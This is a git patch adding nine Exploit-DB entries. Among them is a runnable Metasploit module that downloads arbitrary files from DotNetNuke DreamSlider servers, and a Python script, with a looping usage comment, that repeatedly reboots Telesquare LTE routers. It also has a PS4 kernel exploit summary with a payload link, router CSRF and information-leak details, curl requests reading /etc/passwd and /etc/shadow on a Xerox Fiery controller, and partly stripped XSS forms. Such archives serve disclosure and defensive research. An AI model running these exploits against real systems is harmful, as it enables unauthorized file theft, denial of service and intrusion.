From 267f841bd81068c7101a8f74d35e1bc3d7581259 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 28 Dec 2017 05:02:19 +0000 Subject: [PATCH] DB: 2017-12-28 9 changes to exploits/shellcodes Telesquare SKT LTE Router SDT-CS3B1 - Denial of Service SysGauge Server 3.6.18 - Denial of Service ALLMediaServer 0.95 - Buffer Overflow Sony Playstation 4 4.05 FW - Local Kernel Loader Xerox DC260 EFI Fiery Controller Webtools 2.0 - Arbitrary File Disclosure Easy!Appointments 1.2.1 - Cross-Site Scripting Telesquare SKT LTE Router SDT-CS3B1 - Cross-Site Request Forgery Telesquare SKT LTE Router SDT-CS3B1 - Information Disclosure DotNetNuke DreamSlider 01.01.02 - Arbitrary File Download --- exploits/aspx/webapps/43405.rb | 131 ++++++++++++++++++++++++ exploits/bsd/local/43397.md | 32 ++++++ exploits/hardware/dos/43401.py | 62 ++++++++++++ exploits/hardware/webapps/43400.html | 55 +++++++++++ exploits/hardware/webapps/43402.txt | 53 ++++++++++ exploits/php/webapps/43398.txt | 142 +++++++++++++++++++++++++++ exploits/php/webapps/43399.txt | 112 +++++++++++++++++++++ exploits/windows/dos/43403.py | 41 ++++++++ exploits/windows/dos/43406.py | 44 +++++++++ files_exploits.csv | 9 ++ 10 files changed, 681 insertions(+) create mode 100755 exploits/aspx/webapps/43405.rb create mode 100644 exploits/bsd/local/43397.md create mode 100755 exploits/hardware/dos/43401.py create mode 100644 exploits/hardware/webapps/43400.html create mode 100644 exploits/hardware/webapps/43402.txt create mode 100644 exploits/php/webapps/43398.txt create mode 100644 exploits/php/webapps/43399.txt create mode 100755 exploits/windows/dos/43403.py create mode 100755 exploits/windows/dos/43406.py diff --git a/exploits/aspx/webapps/43405.rb b/exploits/aspx/webapps/43405.rb new file mode 100755 index 000000000..cd81aad5a --- /dev/null +++ b/exploits/aspx/webapps/43405.rb @@ -0,0 +1,131 @@ +# Exploit Title: DotNetNuke DreamSlider Arbitrary File Download +# Date: 23/01/2014 +# Author: Glafkos Charalambous +# Version: 01.01.02 +# Vendor: DreamSlider +# Vendor URL: http://www.dreamslider.com/ +# Google Dork: inurl:/DesktopModules/DreamSlider/ +# CVE: +# +# Description +# DotNetNuke DreamSlider Module prior to version X suffer from a remote unauthenticated arbitrary file download vulnerability +# +# Vulnerable Code +# +# namespace DotNetNuke.Modules.DreamSlider +# { +# using System; +# using System.IO; +# using System.Web.SessionState; +# using System.Web.UI; +# +# public class DownloadProvider : Page, IRequiresSessionState +# { +# protected void Page_Load(object sender, EventArgs e) +# { +# if (!base.IsPostBack && (base.Request.QueryString["File"] != null)) +# { +# string path = base.Request.QueryString["File"]; +# string fileName = Path.GetFileName(path); +# base.Response.ContentType = "application/octet-stream"; +# base.Response.AddHeader("Content-Disposition", "attachment; filename=" + fileName); +# base.Response.WriteFile(path); +# base.Response.End(); +# } +# } +# } +# } + +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + Rank = ExcellentRanking + + include Msf::Auxiliary::Report + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => 'DotNetNuke DreamSlider Arbitrary File Download', + 'Description' => %q{ + This module exploits an unauthenticated arbitrary file download vulnerability in DNN + DreamSlider version 01.01.02 and below. + }, + 'Author' => + [ + 'Glafkos Charalambous', # Discovery and Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'URL', 'http://metasploit.com' ] + ], + 'DisclosureDate' => 'Mar 23 2015')) + + register_options( + [ + Opt::RPORT(80), + OptString.new('FILENAME', [true, 'File to download', '~/web.config']), + OptString.new('PATH', [true, 'Path of DNN Nuke', '/']), + ], self.class) + end + + def check + begin + + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(datastore['PATH'],"/DesktopModules/DreamSlider/DownloadProvider.aspx"), + 'cookie' => datastore['Cookie'], + }) + + if res && res.code == 200 and res.body.to_s =~ /Download Provider/ + return Exploit::CheckCode::Vulnerable + else + return Exploit::CheckCode::Safe + end + Exploit::CheckCode::Safe + end + end + + def run + begin + print_status("#{peer} - Downloading file #{datastore['FILENAME']}") + + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(datastore['PATH'],"/DesktopModules/DreamSlider/DownloadProvider.aspx?File=") + datastore['FILENAME'], + 'cookie' => datastore['Cookie'], + }) + + rescue Rex::ConnectionError + print_error("#{peer} - Could not connect.") + return + end + + if res && res.code == 200 + if res.body.to_s.bytesize == 0 + print_error("#{peer} - 0 bytes returned, file does not exist or it is empty.") + return + end + + fileName = datastore['FILENAME'] + + path = store_loot( + 'ds.http', + 'application/octet-stream', + datastore['RHOST'], + res.body, + fileName + ) + print_good("#{peer} - File saved in: #{path}") + else + print_error("#{peer} - Failed to download file.") + end + end +end \ No newline at end of file diff --git a/exploits/bsd/local/43397.md b/exploits/bsd/local/43397.md new file mode 100644 index 000000000..c1fd66608 --- /dev/null +++ b/exploits/bsd/local/43397.md @@ -0,0 +1,32 @@ +# PS4 4.05 Kernel Exploit +--- +## Summary +In this project you will find a full implementation of the "namedobj" kernel exploit for the PlayStation 4 on 4.05. It will allow you to run arbitrary code as kernel, to allow jailbreaking and kernel-level modifications to the system. This release however, *does not* contain any code related to defeating anti-piracy mechanisms or running homebrew. This exploit does include a loader that listens for payloads on port `9020` and will execute them upon receival. + +You can find fail0verflow's original write-up on the bug [here](https://fail0verflow.com/blog/2017/ps4-namedobj-exploit/), you can find my technical write-up which dives more into implementation specifics ~~here~~ (this is still in progress and will be published within the next few days). + +## Patches Included +The following patches are made by default in the kernel ROP chain: +1) Disable kernel write protection +2) Allow RWX (read-write-execute) memory mapping +3) Dynamic Resolving (`sys_dynlib_dlsym`) allowed from any process +4) Custom system call #11 (`kexec()`) to execute arbitrary code in kernel mode +5) Allow unprivileged users to call `setuid(0)` successfully. Works as a status check, doubles as a privilege escalation. + +## Notes +- This exploit is actually incredibly stable at around 95% in my tests. WebKit very rarely crashes and the same is true with kernel. +- I've built in a patch so the kernel exploit will only run once on the system. You can still make additional patches via payloads. +- A custom syscall is added (#11) to execute any RWX memory in kernel mode, this can be used to execute payloads that want to do fun things like jailbreaking and patching the kernel. +- An SDK is not provided in this release, however a barebones one to get started with may be released at a later date. +- I've released a sample payload [here](http://www.mediafire.com/file/n4boybw0e06h892/debug_settings.bin) that will make the necessary patches to access the debug menu of the system via settings, jailbreaks, and escapes the sandbox. + +## Contributors +I was not alone in this exploit's development, and would like to thank those who helped me along the way below. + +- [qwertyoruiopz](https://twitter.com/qwertyoruiopz) +- [Flatz](https://twitter.com/flat_z) +- [CTurt](https://twitter.com/CTurtE) +- Anonymous + + +E-DB Note: Download ~ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43397.zip \ No newline at end of file diff --git a/exploits/hardware/dos/43401.py b/exploits/hardware/dos/43401.py new file mode 100755 index 000000000..e16caf35c --- /dev/null +++ b/exploits/hardware/dos/43401.py @@ -0,0 +1,62 @@ +#!/usr/bin/env python +# +# +# Telesquare SKT LTE Router SDT-CS3B1 Remote Reboot Denial Of Service +# +# +# Vendor: Telesquare Co., Ltd. +# Product web page: http://www.telesquare.co.kr +# Affected version: FwVer: SDT-CS3B1, sw version 1.2.0 +# LteVer: ML300S5XEA41_090 1 0.1.0 +# Modem model: PM-L300S +# +# Summary: We introduce SDT-CS3B1 LTE router which is a SKT 3G and 4G +# LTE wireless communication based LTE router product. +# +# Desc: The router suffers from an unauthenticated reboot command execution. +# Attackers can exploit this issue to cause a denial of service scenario. +# +# -------------------------------------------------------------------- +# /lte/lteuicc.shtml: +# ------------------- +# +# 858: function RebootRequest() +# 859: { +# 860: var url = "../cgi-bin/lte.cgi?"; +# 861: var param = "Command=Reboot"; +# 862: XHRPost(RebootHandle, url, param, false ); //sync call +# 863: } +# +# -------------------------------------------------------------------- +# +# Tested on: lighttpd/1.4.20 +# +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# @zeroscience +# +# +# Advisory ID: ZSL-2017-5444 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5444.php +# +# +# 22.12.2017 +# + + +import sys, requests + +if len(sys.argv) < 2: + print 'SKT LTE Router SDT-CS3B1 Remote Reboot' + print 'Usage: b00t.py \n' + quit() + +ip = sys.argv[1] +port = sys.argv[2] + +r = requests.get("http://"+ip+":"+port+"/cgi-bin/lte.cgi?Command=Reboot") + +# shw: while true; do ./b00t.py 10.0.0.17 8081; sleep 20; done +#print r.content #if in r.content: , reboot true. + +print "Router rebooted." \ No newline at end of file diff --git a/exploits/hardware/webapps/43400.html b/exploits/hardware/webapps/43400.html new file mode 100644 index 000000000..9c2e25ffd --- /dev/null +++ b/exploits/hardware/webapps/43400.html @@ -0,0 +1,55 @@ +Telesquare SKT LTE Router SDT-CS3B1 CSRF System Command Execution + + +Vendor: Telesquare Co., Ltd. +Product web page: http://www.telesquare.co.kr +Affected version: FwVer: SDT-CS3B1, sw version 1.2.0 + LteVer: ML300S5XEA41_090 1 0.1.0 + Modem model: PM-L300S + +Summary: We introduce SDT-CS3B1 LTE router which is a SKT 3G and 4G +LTE wireless communication based LTE router product. + +Desc: The router suffers from authenticated arbitrary system command +execution. The application interface allows users to perform certain +actions via HTTP requests without performing any validity checks to +verify the requests. This can be exploited to perform certain actions +with administrative privileges if a logged-in user visits a malicious +web site. + +Tested on: lighttpd/1.4.20 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2017-5443 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5443.php + + +22.12.2017 + +-- + + +IDOR for system command interface: +---------------------------------- + +GET /admin/system_command.shtml HTTP/1.1 + + + +PoC GET CSRF request: +--------------------- + + + +
+ + + + +
+ + \ No newline at end of file diff --git a/exploits/hardware/webapps/43402.txt b/exploits/hardware/webapps/43402.txt new file mode 100644 index 000000000..af5e1e68d --- /dev/null +++ b/exploits/hardware/webapps/43402.txt @@ -0,0 +1,53 @@ +Telesquare SKT LTE Router SDT-CS3B1 Insecure Direct Object Reference Info Leak + + +Vendor: Telesquare Co., Ltd. +Product web page: http://www.telesquare.co.kr +Affected version: FwVer: SDT-CS3B1, sw version 1.2.0 + LteVer: ML300S5XEA41_090 1 0.1.0 + Modem model: PM-L300S + +Summary: We introduce SDT-CS3B1 LTE router which is a SKT 3G and 4G +LTE wireless communication based LTE router product. + +Desc: Insecure direct object references occur when an application +provides direct access to objects based on user-supplied input. As +a result of this vulnerability attackers can bypass authorization +and access resources and functionalities in the system. + +Tested on: lighttpd/1.4.20 +Linux mips + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2017-5445 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5445.php + + +22.12.2017 + +-- + + + +/home.html << Version and status info leak (firmware, device, type, modem, lte) +/index.html << Version and status info leak (firmware, device, type, modem, lte) +/nas/smbsrv.shtml << Samba server settings (workgroup, netbios name) +/nas/ftpsrv.shtml << FTP settings +/wifi2g/basic.shtml << Wireless settings +/admin/status.shtml << Access point status info leak +/internet/wan.shtml << WAN settings info leak (wanip, subnet, gateway, macaddr, lteipaddr, dns) +/internet/lan.shtml << LAN settings info leak (dhcpip, lanip, macaddr, gateway, subnet, dns) +/admin/statistic.shtml << System statistics info leak +/admin/management.shtml << System management (account settings, ntp settings, ddns settings) +/serial/serial_direct.shtml << Direct serial settings (network connection settings, serverip, port) +/admin/system_command.shtml << System command interface +/internet/dhcpcliinfo.shtml << DHCP Clients info leak (hostname, macaddr, ipaddr) +/admin/upload_firmware.shtml << Router firmware and lte firmware upgrade +/firewall/vpn_futuresystem.shtml << VPN settings (udp packet transfer, icmp check) +/cgi-bin/lte.cgi?Command=getUiccState << GetUiccState() +/cgi-bin/lte.cgi?Command=getModemStatus << Modem status info leak +/cgi-bin/systemutil.cgi?Command=SystemInfo << System info leak \ No newline at end of file diff --git a/exploits/php/webapps/43398.txt b/exploits/php/webapps/43398.txt new file mode 100644 index 000000000..d40ff05e5 --- /dev/null +++ b/exploits/php/webapps/43398.txt @@ -0,0 +1,142 @@ +Xerox DC260 EFI Fiery Controller Webtools 2.0 Arbitrary File Disclosure + + +Vendor: Electronics for Imaging, Inc. +Product web page: http://www.efi.com +Affected version: EFI Fiery Controller SW2.0 + Xerox DocuColor 260, 250, 242 + +Summary: Drive production profitability with Fiery servers and workflow +products. See which Fiery digital front end is right for your current +or future print engines and business needs. Manage all your printers +from a single screen using this intuitive print job management interface. + +Desc: Input passed thru the 'file' GET parameter in 'forceSave.php' +script is not properly sanitized before being used to read files. This +can be exploited by an unauthenticated attacker to read arbitrary files +on the affected system. + +====================================================================== +/wt3/js/save.js: +---------------- + +103: function parseSaveMessages() { +104: var urlNode = saveDocument.getElementsByTagName('url').item(0); +105: var url = urlNode.firstChild.data; +106: var forcedSaveUrl = "forceSave.php?file=" + url; +107: window.open(forcedSaveUrl, 'save_iframe', 'width=1,height=1'); + +==== + +/wt3/forceSave.php: +------------------- + 1. + +====================================================================== + + +Tested on: Debian GNU/Linux 3.1 + Apache + PHP/5.4.41 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2017-5447 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5447.php + + +20.12.2017 + +-- + + +# curl "http://10.0.0.19/wt3/forceSave.php?file=/etc/passwd" +root:x:0:0:root:/root:/bin/bash +daemon:x:1:1:daemon:/usr/sbin:/bin/sh +bin:x:2:2:bin:/bin:/bin/sh +sys:x:3:3:sys:/dev:/bin/sh +sync:x:4:100:sync:/bin:/bin/sync +games:x:5:100:games:/usr/games:/bin/sh +... +... + + +# curl "http://10.0.0.19/wt3/forceSave.php?file=/etc/shadow" +root:LUUVeT6GbOy9I:10978:0:99999:7::: +daemon:*:10979:0:99999:7::: +bin:*:10979:0:99999:7::: +sys:*:10979:0:99999:7::: +sync:*:10979:0:99999:7::: +games:*:10979:0:99999:7::: +... +... \ No newline at end of file diff --git a/exploits/php/webapps/43399.txt b/exploits/php/webapps/43399.txt new file mode 100644 index 000000000..159df1125 --- /dev/null +++ b/exploits/php/webapps/43399.txt @@ -0,0 +1,112 @@ +Easy!Appointments v1.2.1 Multiple Stored XSS Vulnerabilities + + +Vendor: Alex Tselegidis +Product web page: http://www.easyappointments.org +Affected version: 1.2.1 + +Summary: Easy!Appointments is a highly customizable web application +that allows your customers to book appointments with you via the web. +Moreover, it provides the ability to sync your data with Google Calendar +so you can use them with other services. It is an open source project +and you can download and install it even for commercial use. Easy!Appointments +will run smoothly with your existing website, because it can be installed +in a single folder of the server and of course, both sites can share +the same database. Learn more about the project in the Features page. + +Desc: The application suffers from multiple stored and reflected XSS +vulnerabilities. The issues are triggered when an unauthorized input +passed via multiple POST and GET parameters is not properly sanitized +before being returned to the user. This can be exploited to execute +arbitrary HTML and script code in a user's browser session in context +of an affected site. + +Tested on: Apache/2.4.23 (Win32) + OpenSSL/1.0.2h + MariaDB-10.1.19 + PHP/5.6.28 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2017-5442 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5442.php + + +20.10.2017 + +-- + + +PoC: + +{"name":"XSS1","description":"Description"} + + + +
+ + + +
+ + + +--- + + + +
+ + + + + + + +
+ + + +--- + + + +
+ + + + + + + +
+ + + +--- + + + +
+ + + + + + + + +